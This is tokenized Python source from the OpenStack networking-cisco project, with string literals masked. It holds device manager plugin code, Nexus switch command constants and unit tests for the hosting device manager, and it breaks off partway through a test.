import_object ( <EOL> cfg . CONF . general . configuration_agent_scheduler_driver ) <EOL> self . _setup_cfg_agent_monitoring ( ) <EOL> def setup_rpc ( self ) : <EOL> self . topic = c_constants . DEVICE_MANAGER_PLUGIN <EOL> self . conn = n_rpc . create_connection ( new = True ) <EOL> self . agent_notifiers [ c_constants . AGENT_TYPE_CFG ] = ( <EOL> devmgr_rpc_cfgagent_api . DeviceMgrCfgAgentNotifyAPI ( self ) ) <EOL> self . endpoints = [ devices_rpc . DeviceMgrCfgRpcCallback ( self ) ] <EOL> self . conn . create_consumer ( self . topic , self . endpoints , fanout = False ) <EOL> self . conn . consume_in_threads ( ) <EOL> def _setup_cfg_agent_monitoring ( self ) : <EOL> LOG . debug ( '<STR_LIT>' ) <EOL> self . _heartbeat = loopingcall . FixedIntervalLoopingCall ( <EOL> self . _check_config_agents ) <EOL> self . _heartbeat . start ( <EOL> interval = cfg . CONF . general . cfg_agent_monitoring_interval ) <EOL> @ property <EOL> def _core_plugin ( self ) : <EOL> try : <EOL> return self . _plugin <EOL> except AttributeError : <EOL> self . _plugin = manager . NeutronManager . get_plugin ( ) <EOL> return self . _plugin </s>
<s> """<STR_LIT>""" <EOL> EXEC_CONF_SNIPPET = """<STR_LIT>""" <EOL> EXEC_GET_INTF_SNIPPET = """<STR_LIT>""" <EOL> EXEC_GET_VERSION_SNIPPET = """<STR_LIT>""" <EOL> EXEC_GET_INVENTORY_SNIPPET = """<STR_LIT>""" <EOL> EXEC_SAVE_CONF_SNIPPET = """<STR_LIT>""" <EOL> EXEC_GET_VLAN_SNIPPET = """<STR_LIT>""" <EOL> CMD_VLAN_CONF_SNIPPET = """<STR_LIT>""" <EOL> CMD_VLAN_CONF_VNSEGMENT_SNIPPET = """<STR_LIT>""" <EOL> CMD_VLAN_CREATE_SNIPPET = """<STR_LIT>""" <EOL> CMD_VLAN_ACTIVE_SNIPPET = """<STR_LIT>""" <EOL> CMD_VLAN_NO_SHUTDOWN_SNIPPET = """<STR_LIT>""" <EOL> CMD_NO_VLAN_CONF_SNIPPET = """<STR_LIT>""" <EOL> CMD_INT_VLAN_NATIVE_HEADER = """<STR_LIT>""" <EOL> CMD_INT_VLAN_NATIVE_TRAILER = """<STR_LIT>""" <EOL> CMD_INT_VLAN_ALLOWED_HEADER = """<STR_LIT>""" <EOL> CMD_INT_VLAN_ALLOWED_TRAILER = """<STR_LIT>""" <EOL> CMD_INT_VLAN_HEADER = """<STR_LIT>""" <EOL> CMD_VLAN_ID = """<STR_LIT>""" <EOL> CMD_VLAN_ADD_ID = """<STR_LIT>""" % CMD_VLAN_ID <EOL> CMD_INT_VLAN_TRAILER = """<STR_LIT>""" <EOL> CMD_INT_VLAN_SNIPPET = ( CMD_INT_VLAN_HEADER + <EOL> CMD_INT_VLAN_ALLOWED_HEADER + <EOL> CMD_VLAN_ID + <EOL> CMD_INT_VLAN_ALLOWED_TRAILER + <EOL> CMD_INT_VLAN_TRAILER ) <EOL> CMD_INT_VLAN_ADD_SNIPPET = ( CMD_INT_VLAN_HEADER + <EOL> CMD_INT_VLAN_ALLOWED_HEADER + <EOL> CMD_VLAN_ADD_ID + <EOL> CMD_INT_VLAN_ALLOWED_TRAILER + <EOL> CMD_INT_VLAN_TRAILER ) <EOL> CMD_INT_VLAN_NATIVE_SNIPPET = ( CMD_INT_VLAN_HEADER + <EOL> CMD_INT_VLAN_NATIVE_HEADER + <EOL> CMD_VLAN_ID + <EOL> CMD_INT_VLAN_NATIVE_TRAILER + <EOL> CMD_INT_VLAN_TRAILER ) <EOL> CMD_PORT_TRUNK = """<STR_LIT>""" <EOL> CMD_NO_SWITCHPORT = """<STR_LIT>""" <EOL> CMD_NO_VLAN_INT_SNIPPET = """<STR_LIT>""" <EOL> CMD_NO_VLAN_INT_NATIVE_SNIPPET = """<STR_LIT>""" <EOL> CMD_VLAN_SVI_SNIPPET = """<STR_LIT>""" <EOL> CMD_NO_VLAN_SVI_SNIPPET = """<STR_LIT>""" <EOL> CMD_INT_NVE_SNIPPET = """<STR_LIT>""" <EOL> CMD_NO_INT_NVE_SNIPPET = """<STR_LIT>""" <EOL> CMD_INT_NVE_MEMBER_SNIPPET = """<STR_LIT>""" <EOL> CMD_INT_NVE_NO_MEMBER_SNIPPET = """<STR_LIT>""" 
<EOL> CMD_FEATURE_VXLAN_SNIPPET = """<STR_LIT>""" <EOL> CMD_NO_FEATURE_VXLAN_SNIPPET = """<STR_LIT>""" <EOL> RE_GET_VLAN_ID = "<STR_LIT>" <EOL> RE_GET_VLAN_NAME = "<STR_LIT>" <EOL> RE_GET_VLAN_STATE = "<STR_LIT>" <EOL> RE_GET_VLAN_SHUT_STATE = "<STR_LIT>" </s>
<s> import os <EOL> import contextlib <EOL> import mock <EOL> from oslo_config import cfg <EOL> from oslo_utils import importutils <EOL> import six <EOL> import webob . exc <EOL> from neutron . api import extensions as api_ext <EOL> from neutron . common import config <EOL> from neutron import context as n_context <EOL> from neutron . manager import NeutronManager <EOL> from neutron . plugins . common import constants as svc_constants <EOL> from neutron . tests . unit . db import test_db_base_plugin_v2 <EOL> import networking_cisco <EOL> from networking_cisco . plugins . cisco . common import ( cisco_constants as <EOL> c_constants ) <EOL> from networking_cisco . plugins . cisco . db . device_manager import ( <EOL> hosting_device_manager_db as hdm_db ) <EOL> from networking_cisco . plugins . cisco . device_manager . rpc import ( <EOL> devmgr_rpc_cfgagent_api ) <EOL> from networking_cisco . plugins . cisco . device_manager import service_vm_lib <EOL> from networking_cisco . plugins . cisco . extensions import ciscohostingdevicemanager <EOL> from networking_cisco . tests . unit . cisco . device_manager import ( <EOL> device_manager_test_support ) <EOL> policy_path = ( os . path . abspath ( networking_cisco . __path__ [ <NUM_LIT:0> ] ) + <EOL> '<STR_LIT>' ) <EOL> DB_DM_PLUGIN_KLASS = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> NN_CATEGORY = ciscohostingdevicemanager . NETWORK_NODE_CATEGORY <EOL> NN_TEMPLATE_NAME = c_constants . NETWORK_NODE_TEMPLATE <EOL> NS_ROUTERTYPE_NAME = c_constants . NAMESPACE_ROUTER_TYPE <EOL> VM_CATEGORY = ciscohostingdevicemanager . VM_CATEGORY <EOL> VM_TEMPLATE_NAME = "<STR_LIT>" <EOL> VM_BOOTING_TIME = <NUM_LIT> <EOL> VM_SLOT_CAPACITY = <NUM_LIT:3> <EOL> VM_DESIRED_SLOTS_FREE = <NUM_LIT:3> <EOL> VM_ROUTERTYPE_NAME = c_constants . CSR1KV_ROUTER_TYPE <EOL> HW_CATEGORY = ciscohostingdevicemanager . HARDWARE_CATEGORY <EOL> HW_TEMPLATE_NAME = "<STR_LIT>" <EOL> HW_ROUTERTYPE_NAME = "<STR_LIT>" <EOL> L3_ROUTER_NAT = svc_constants . 
L3_ROUTER_NAT <EOL> DEFAULT_SERVICE_TYPES = "<STR_LIT>" <EOL> NETWORK_NODE_SERVICE_TYPES = "<STR_LIT>" <EOL> NOOP_DEVICE_DRIVER = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> NOOP_PLUGGING_DRIVER = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> TEST_DEVICE_DRIVER = NOOP_DEVICE_DRIVER <EOL> TEST_PLUGGING_DRIVER = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> DESCRIPTION = "<STR_LIT>" <EOL> SHARED = True <EOL> ACTION = "<STR_LIT>" <EOL> ENABLED = True <EOL> ADMIN_STATE_UP = True <EOL> UNBOUND = None <EOL> REQUESTER = True <EOL> OTHER = False <EOL> DEFAULT_CREDENTIALS_ID = device_manager_test_support . _uuid ( ) <EOL> class DeviceManagerTestCaseMixin ( object ) : <EOL> def _create_hosting_device ( self , fmt , template_id , management_port_id , <EOL> admin_state_up , expected_res_status = None , <EOL> ** kwargs ) : <EOL> data = { '<STR_LIT>' : self . _get_test_hosting_device_attr ( <EOL> template_id = template_id , management_port_id = management_port_id , <EOL> admin_state_up = admin_state_up , ** kwargs ) } <EOL> hd_req = self . new_create_request ( '<STR_LIT>' , data , fmt ) <EOL> if kwargs . get ( '<STR_LIT>' ) and '<STR_LIT>' in kwargs : <EOL> hd_req . environ [ '<STR_LIT>' ] = n_context . Context ( <EOL> '<STR_LIT>' , kwargs [ '<STR_LIT>' ] ) <EOL> hd_res = hd_req . get_response ( self . ext_api ) <EOL> if expected_res_status : <EOL> self . assertEqual ( expected_res_status , hd_res . status_int ) <EOL> return hd_res <EOL> @ contextlib . contextmanager <EOL> def hosting_device ( self , template_id , management_port_id = None , fmt = None , <EOL> admin_state_up = True , no_delete = False , <EOL> set_port_device_id = True , ** kwargs ) : <EOL> if not fmt : <EOL> fmt = self . fmt <EOL> res = self . _create_hosting_device ( fmt , template_id , management_port_id , <EOL> admin_state_up , ** kwargs ) <EOL> if res . status_int >= <NUM_LIT> : <EOL> raise webob . exc . HTTPClientError ( code = res . status_int ) <EOL> hosting_device = self . 
deserialize ( fmt or self . fmt , res ) <EOL> if set_port_device_id is True and management_port_id is not None : <EOL> data = { '<STR_LIT:port>' : { <EOL> '<STR_LIT>' : hosting_device [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> req = self . new_update_request ( '<STR_LIT>' , data , management_port_id ) <EOL> res = self . deserialize ( self . fmt , req . get_response ( self . api ) ) <EOL> yield hosting_device <EOL> if not no_delete : <EOL> self . _delete ( '<STR_LIT>' , <EOL> hosting_device [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> def _create_hosting_device_template ( self , fmt , name , enabled , <EOL> host_category , <EOL> expected_res_status = None , ** kwargs ) : <EOL> data = { '<STR_LIT>' : <EOL> self . _get_test_hosting_device_template_attr ( <EOL> name = name , enabled = enabled , host_category = host_category , <EOL> ** kwargs ) } <EOL> hdt_req = self . new_create_request ( '<STR_LIT>' , data , <EOL> fmt ) <EOL> if kwargs . get ( '<STR_LIT>' ) and '<STR_LIT>' in kwargs : <EOL> hdt_req . environ [ '<STR_LIT>' ] = n_context . Context ( <EOL> '<STR_LIT>' , kwargs [ '<STR_LIT>' ] ) <EOL> hdt_res = hdt_req . get_response ( self . ext_api ) <EOL> if expected_res_status : <EOL> self . assertEqual ( expected_res_status , hdt_res . status_int ) <EOL> return hdt_res <EOL> @ contextlib . contextmanager <EOL> def hosting_device_template ( self , fmt = None , name = '<STR_LIT>' , <EOL> enabled = True , host_category = VM_CATEGORY , <EOL> no_delete = False , ** kwargs ) : <EOL> if not fmt : <EOL> fmt = self . fmt <EOL> res = self . _create_hosting_device_template ( fmt , name , enabled , <EOL> host_category , ** kwargs ) <EOL> if res . status_int >= <NUM_LIT> : <EOL> raise webob . exc . HTTPClientError ( code = res . status_int ) <EOL> hd_template = self . deserialize ( fmt or self . fmt , res ) <EOL> yield hd_template <EOL> if not no_delete : <EOL> self . 
_delete ( '<STR_LIT>' , <EOL> hd_template [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> def _get_test_hosting_device_attr ( self , template_id , management_port_id , <EOL> admin_state_up = True , ** kwargs ) : <EOL> data = { <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , self . _tenant_id ) , <EOL> '<STR_LIT>' : template_id , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : admin_state_up , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> '<STR_LIT>' : management_port_id , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , False ) } <EOL> return data <EOL> def _get_test_hosting_device_template_attr ( self , name = '<STR_LIT>' , <EOL> enabled = True , <EOL> host_category = VM_CATEGORY , <EOL> ** kwargs ) : <EOL> data = { <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , self . _tenant_id ) , <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : enabled , <EOL> '<STR_LIT>' : host_category , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <EOL> DEFAULT_SERVICE_TYPES ) , <EOL> '<STR_LIT:image>' : kwargs . get ( '<STR_LIT:image>' ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <EOL> DEFAULT_CREDENTIALS_ID ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : kwargs . get ( '<STR_LIT>' , NOOP_DEVICE_DRIVER ) , <EOL> '<STR_LIT>' : kwargs . 
get ( '<STR_LIT>' , <EOL> NOOP_PLUGGING_DRIVER ) } <EOL> return data <EOL> def _test_list_resources ( self , resource , items , <EOL> neutron_context = None , <EOL> query_params = None ) : <EOL> if resource . endswith ( '<STR_LIT:y>' ) : <EOL> resource_plural = resource . replace ( '<STR_LIT:y>' , '<STR_LIT>' ) <EOL> else : <EOL> resource_plural = resource + '<STR_LIT:s>' <EOL> res = self . _list ( resource_plural , <EOL> neutron_context = neutron_context , <EOL> query_params = query_params ) <EOL> resource = resource . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> self . assertEqual ( sorted ( [ i [ resource ] [ '<STR_LIT:id>' ] for i in items ] ) , <EOL> sorted ( [ i [ '<STR_LIT:id>' ] for i in res [ resource_plural ] ] ) ) <EOL> def _replace_hosting_device_status ( self , attrs , old_status , new_status ) : <EOL> if attrs [ '<STR_LIT:status>' ] is old_status : <EOL> attrs [ '<STR_LIT:status>' ] = new_status <EOL> return attrs <EOL> def _test_create_hosting_device_templates ( self ) : <EOL> nnt = self . _create_hosting_device_template ( self . fmt , NN_TEMPLATE_NAME , <EOL> True , NN_CATEGORY ) <EOL> nw_node_template = self . deserialize ( self . fmt , nnt ) <EOL> vmt = self . _create_hosting_device_template ( <EOL> self . fmt , VM_TEMPLATE_NAME , True , VM_CATEGORY , <EOL> booting_time = VM_BOOTING_TIME , <EOL> slot_capacity = VM_SLOT_CAPACITY , <EOL> desired_slots_free = VM_DESIRED_SLOTS_FREE , <EOL> device_driver = TEST_DEVICE_DRIVER , <EOL> plugging_driver = TEST_PLUGGING_DRIVER ) <EOL> vm_template = self . deserialize ( self . fmt , vmt ) <EOL> hwt = self . _create_hosting_device_template ( <EOL> self . fmt , HW_TEMPLATE_NAME , True , HW_CATEGORY ) <EOL> hw_template = self . deserialize ( self . 
fmt , hwt ) <EOL> return { '<STR_LIT>' : { '<STR_LIT>' : nw_node_template , <EOL> '<STR_LIT>' : NS_ROUTERTYPE_NAME } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : vm_template , <EOL> '<STR_LIT>' : VM_ROUTERTYPE_NAME } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : hw_template , <EOL> '<STR_LIT>' : HW_ROUTERTYPE_NAME } } <EOL> def _test_remove_hosting_device_templates ( self ) : <EOL> for hdt in self . _list ( '<STR_LIT>' ) [ <EOL> '<STR_LIT>' ] : <EOL> self . _delete ( '<STR_LIT>' , hdt [ '<STR_LIT:id>' ] ) <EOL> class TestDeviceManagerDBPlugin ( <EOL> test_db_base_plugin_v2 . NeutronDbPluginV2TestCase , <EOL> DeviceManagerTestCaseMixin , <EOL> device_manager_test_support . DeviceManagerTestSupportMixin ) : <EOL> hdm_db . HostingDeviceManagerMixin . path_prefix = "<STR_LIT>" <EOL> resource_prefix_map = dict ( <EOL> ( k , "<STR_LIT>" ) <EOL> for k in ciscohostingdevicemanager . RESOURCE_ATTRIBUTE_MAP . keys ( ) ) <EOL> def setUp ( self , core_plugin = None , dm_plugin = None , ext_mgr = None ) : <EOL> if dm_plugin is None : <EOL> dm_plugin = DB_DM_PLUGIN_KLASS <EOL> service_plugins = { '<STR_LIT>' : dm_plugin } <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> device_manager_test_support . extensions_path ) <EOL> cfg . CONF . set_default ( '<STR_LIT>' , True ) <EOL> hdm_db . HostingDeviceManagerMixin . supported_extension_aliases = ( <EOL> [ ciscohostingdevicemanager . HOSTING_DEVICE_MANAGER_ALIAS ] ) <EOL> super ( TestDeviceManagerDBPlugin , self ) . setUp ( <EOL> plugin = core_plugin , service_plugins = service_plugins , <EOL> ext_mgr = ext_mgr ) <EOL> cfg . CONF . set_override ( '<STR_LIT>' , policy_path , '<STR_LIT>' ) <EOL> if not ext_mgr : <EOL> self . plugin = importutils . import_object ( dm_plugin ) <EOL> ext_mgr = api_ext . PluginAwareExtensionManager ( <EOL> device_manager_test_support . extensions_path , <EOL> { c_constants . DEVICE_MANAGER : self . plugin } ) <EOL> app = config . load_paste_app ( '<STR_LIT>' ) <EOL> self . ext_api = api_ext . 
ExtensionMiddleware ( app , ext_mgr = ext_mgr ) <EOL> self . _mock_l3_admin_tenant ( ) <EOL> self . _create_mgmt_nw_for_tests ( self . fmt ) <EOL> self . _devmgr = NeutronManager . get_service_plugins ( ) [ <EOL> c_constants . DEVICE_MANAGER ] <EOL> self . _devmgr . _svc_vm_mgr_obj = service_vm_lib . ServiceVMManager ( <EOL> True , None , None , None , '<STR_LIT>' , keystone_session = mock . MagicMock ( ) ) <EOL> self . _mock_svc_vm_create_delete ( self . _devmgr ) <EOL> self . _other_tenant_id = device_manager_test_support . _uuid ( ) <EOL> self . _devmgr . _core_plugin = NeutronManager . get_plugin ( ) <EOL> def tearDown ( self ) : <EOL> self . _test_remove_all_hosting_devices ( ) <EOL> self . _remove_mgmt_nw_for_tests ( ) <EOL> super ( TestDeviceManagerDBPlugin , self ) . tearDown ( ) <EOL> def test_create_vm_hosting_device ( self ) : <EOL> with self . hosting_device_template ( ) as hdt : <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> creds = device_manager_test_support . _uuid ( ) <EOL> attrs = self . _get_test_hosting_device_attr ( <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> auto_delete = True , credentials_id = creds ) <EOL> with self . hosting_device ( <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> auto_delete = True , credentials_id = creds ) as hd : <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , hd [ '<STR_LIT>' ] [ k ] ) <EOL> def test_create_hw_hosting_device ( self ) : <EOL> with self . hosting_device_template ( host_category = HW_CATEGORY ) as hdt : <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> creds = device_manager_test_support . _uuid ( ) <EOL> attrs = self . 
_get_test_hosting_device_attr ( <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> credentials_id = creds ) <EOL> with self . hosting_device ( <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> credentials_id = creds ) as hd : <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , hd [ '<STR_LIT>' ] [ k ] ) <EOL> def test_show_hosting_device ( self ) : <EOL> device_id = "<STR_LIT>" <EOL> with self . hosting_device_template ( ) as hdt : <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> creds = device_manager_test_support . _uuid ( ) <EOL> attrs = self . _get_test_hosting_device_attr ( <EOL> device_id = device_id , <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> credentials_id = creds ) <EOL> with self . hosting_device ( <EOL> device_id = device_id , <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> credentials_id = creds ) as hd : <EOL> req = self . new_show_request ( <EOL> '<STR_LIT>' , hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> fmt = self . fmt ) <EOL> res = self . deserialize ( self . fmt , <EOL> req . get_response ( self . ext_api ) ) <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , res [ '<STR_LIT>' ] [ k ] ) <EOL> def test_list_hosting_devices ( self ) : <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port1 , self . port ( subnet = self . _mgmt_subnet ) as mgmt_port2 , self . port ( subnet = self . 
_mgmt_subnet ) as mgmt_port3 : <EOL> mp1_id = mgmt_port1 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> mp2_id = mgmt_port2 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> mp3_id = mgmt_port3 [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> with self . hosting_device ( <EOL> name = '<STR_LIT>' , template_id = hdt_id , <EOL> management_port_id = mp1_id ) as hd1 , self . hosting_device ( <EOL> name = '<STR_LIT>' , template_id = hdt_id , <EOL> management_port_id = mp2_id ) as hd2 , self . hosting_device ( <EOL> name = '<STR_LIT>' , template_id = hdt_id , <EOL> management_port_id = mp3_id ) as hd3 : <EOL> self . _test_list_resources ( <EOL> '<STR_LIT>' , [ hd1 , hd2 , hd3 ] , <EOL> query_params = '<STR_LIT>' + hdt_id ) <EOL> def test_update_hosting_device ( self ) : <EOL> new_device_id = "<STR_LIT>" <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> mgmt_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> creds = device_manager_test_support . _uuid ( ) <EOL> attrs = self . _get_test_hosting_device_attr ( <EOL> device_id = new_device_id , <EOL> template_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] , <EOL> management_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] , <EOL> credentials_id = creds ) <EOL> with self . hosting_device ( <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port_id , <EOL> credentials_id = creds ) as hd : <EOL> data = { '<STR_LIT>' : { '<STR_LIT>' : new_device_id } } <EOL> req = self . new_update_request ( '<STR_LIT>' , data , <EOL> hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> res = self . deserialize ( self . fmt , <EOL> req . get_response ( self . ext_api ) ) <EOL> for k , v in six . iteritems ( attrs ) : <EOL> self . assertEqual ( v , res [ '<STR_LIT>' ] [ k ] ) <EOL> def test_delete_hosting_device_not_in_use_succeeds ( self ) : <EOL> ctx = n_context . 
get_admin_context ( ) <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> mgmt_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> with self . hosting_device ( template_id = hdt_id , <EOL> management_port_id = mgmt_port_id , <EOL> no_delete = True ) as hd : <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> req = self . new_delete_request ( '<STR_LIT>' , hd_id ) <EOL> res = req . get_response ( self . ext_api ) <EOL> self . assertEqual ( <NUM_LIT> , res . status_int ) <EOL> self . assertRaises ( <EOL> ciscohostingdevicemanager . HostingDeviceNotFound , <EOL> self . plugin . get_hosting_device , ctx , hd_id ) <EOL> def test_delete_hosting_device_in_use_fails ( self ) : <EOL> ctx = n_context . get_admin_context ( ) <EOL> with self . hosting_device_template ( slot_capacity = <NUM_LIT:1> ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> mgmt_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> with self . hosting_device ( <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port_id ) as hd : <EOL> with mock . patch . object ( <EOL> hdm_db . HostingDeviceManagerMixin , <EOL> '<STR_LIT>' ) : <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> hd_db = self . _devmgr . _get_hosting_device ( ctx , hd_id ) <EOL> resource = self . _get_fake_resource ( ) <EOL> self . assertTrue ( <EOL> self . _devmgr . acquire_hosting_device_slots ( <EOL> ctx , hd_db , resource , '<STR_LIT>' , L3_ROUTER_NAT , <EOL> <NUM_LIT:1> ) ) <EOL> self . assertRaises ( <EOL> ciscohostingdevicemanager . HostingDeviceInUse , <EOL> self . _devmgr . delete_hosting_device , ctx , hd_id ) <EOL> req = self . new_show_request ( '<STR_LIT>' , hd_id , <EOL> fmt = self . fmt ) <EOL> res = req . get_response ( self . ext_api ) <EOL> self . 
assertEqual ( <NUM_LIT:200> , res . status_int ) <EOL> self . _devmgr . release_hosting_device_slots ( ctx , hd_db , <EOL> resource , <NUM_LIT:1> ) <EOL> def test_get_hosting_device_configuration ( self ) : <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> mgmt_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> with self . hosting_device ( <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port_id ) as hd : <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> rpc = devmgr_rpc_cfgagent_api . DeviceMgrCfgAgentNotifyAPI ( <EOL> self . _devmgr ) <EOL> self . _devmgr . agent_notifiers = { <EOL> c_constants . AGENT_TYPE_CFG : rpc } <EOL> self . _devmgr . get_cfg_agents_for_hosting_devices = None <EOL> with mock . patch . object ( rpc . client , '<STR_LIT>' , <EOL> return_value = rpc . client ) as ( <EOL> mock_prepare ) , mock . patch . object ( rpc . client , '<STR_LIT>' ) as mock_call , mock . patch . object ( <EOL> self . _devmgr , <EOL> '<STR_LIT>' ) as agt_mock : <EOL> agt_mock . return_value = [ mock . MagicMock ( ) ] <EOL> agent_host = '<STR_LIT>' <EOL> agt_mock . return_value [ <NUM_LIT:0> ] . host = agent_host <EOL> fake_running_config = '<STR_LIT>' <EOL> mock_call . return_value = fake_running_config <EOL> ctx = n_context . Context ( <EOL> user_id = None , tenant_id = None , is_admin = False , <EOL> overwrite = False ) <EOL> res = self . _devmgr . get_hosting_device_config ( ctx , <EOL> hd_id ) <EOL> self . assertEqual ( fake_running_config , res ) <EOL> agt_mock . assert_called_once_with ( <EOL> mock . ANY , [ hd_id ] , admin_state_up = True , <EOL> schedule = True ) <EOL> mock_prepare . assert_called_with ( server = agent_host ) <EOL> mock_call . assert_called_with ( <EOL> mock . 
ANY , '<STR_LIT>' , <EOL> payload = { '<STR_LIT>' : hd_id } ) <EOL> def test_get_hosting_device_configuration_no_agent_found ( self ) : <EOL> ctx = n_context . Context ( user_id = None , tenant_id = None , is_admin = False , <EOL> overwrite = False ) <EOL> with self . hosting_device_template ( ) as hdt : <EOL> hdt_id = hdt [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> with self . port ( subnet = self . _mgmt_subnet ) as mgmt_port : <EOL> mgmt_port_id = mgmt_port [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] <EOL> with self . hosting_device ( <EOL> template_id = hdt_id , <EOL> management_port_id = mgmt_port_id ) as hd : <EOL> hd_id = hd [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> rpc = devmgr_rpc_cfgagent_api . DeviceMgrCfgAgentNotifyAPI ( <EOL> self . _devmgr ) <EOL> self . _devmgr . agent_notifiers = { <EOL> c_constants . AGENT_TYPE_CFG : rpc } <EOL> self . _devmgr . get_cfg_agents_for_hosting_devices = None <EOL> with mock . patch . object ( rpc . client , '<STR_LIT>' , <EOL> return_value = rpc . client ) as ( <EOL> mock_prepare ) , mock . patch . object ( rpc . client , '<STR_LIT>' ) as mock_call , mock . patch . object ( <EOL> self . _devmgr , <EOL> '<STR_LIT>' ) as agt_mock : <EOL> agt_mock . return_value = [ ] <EOL> res = self . _devmgr . get_hosting_device_config 